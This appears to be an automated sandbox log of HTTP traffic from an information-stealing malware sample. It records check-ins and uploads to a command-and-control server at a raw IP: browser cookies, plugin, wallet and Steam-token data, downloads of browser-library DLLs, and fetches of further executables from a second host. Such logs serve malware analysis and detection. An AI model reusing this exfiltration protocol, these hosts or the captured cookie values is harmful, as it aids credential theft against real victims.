Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBAHost: 46.8.231.109Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 42 43 34 44 36 34 38 39 46 42 34 31 30 39 33 35 33 31 37 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 2d 2d 0d 0a Data Ascii: ------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="hwid"62BC4D6489FB4109353171------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="build"default------DGHIDAFCGIEHIEBFCFBA--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEHHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="message"browsers------HIDAKFIJJKJJJKEBKJEH--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGIIEBFCBAAAAKKEGHHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 2d 2d 0d 0a Data Ascii: ------IJDGIIEBFCBAAAAKKEGHContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------IJDGIIEBFCBAAAAKKEGHContent-Disposition: form-data; name="message"plugins------IJDGIIEBFCBAAAAKKEGH--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHIHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 2d 2d 0d 0a Data Ascii: ------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="message"fplugins------BKECAEBGHDAEBFHIEGHI--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDBHost: 46.8.231.109Content-Length: 6063Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGHost: 46.8.231.109Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 2d 2d 0d 0a Data Ascii: ------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKKEHJKFCFCBFHIIDGDHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 2d 2d 0d 0a Data Ascii: ------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="file"------KKKKEHJKFCFCBFHIIDGD--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCGIDAKECGCBGDBAFIHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 2d 2d 0d 0a Data Ascii: ------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="file"------FBFCGIDAKECGCBGDBAFI--
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: 46.8.231.109Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="message"wallets------AFBFHDBKJEGHJJJKFIIJ--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFHost: 46.8.231.109Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 2d 2d 0d 0a Data Ascii: ------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="message"files------CAAKKFHCFIECAAAKEGCF--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCAAFBFBKFIDGDHJDBHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------HDGCAAFBFBKFIDGDHJDBContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------HDGCAAFBFBKFIDGDHJDBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HDGCAAFBFBKFIDGDHJDBContent-Disposition: form-data; name="file"------HDGCAAFBFBKFIDGDHJDB--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="message"ybncbhylepme------EHJDHJKFIECAAKFIJJKJ--
Source: global traffic	HTTP traffic detected: GET /prog/66d70775c548d_v.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66d7077a2064d_l.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFCHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 2d 2d 0d 0a Data Ascii: ------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GCGHCBKFCFBFHIDHDBFC--
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIIJJDHDGCGDHIJDAKHost: 147.45.68.138Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 42 43 34 44 36 34 38 39 46 42 34 31 30 39 33 35 33 31 37 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 2d 2d 0d 0a Data Ascii: ------JDGIIJJDHDGCGDHIJDAKContent-Disposition: form-data; name="hwid"62BC4D6489FB4109353171-a33c7340-61ca------JDGIIJJDHDGCGDHIJDAKContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------JDGIIJJDHDGCGDHIJDAK--
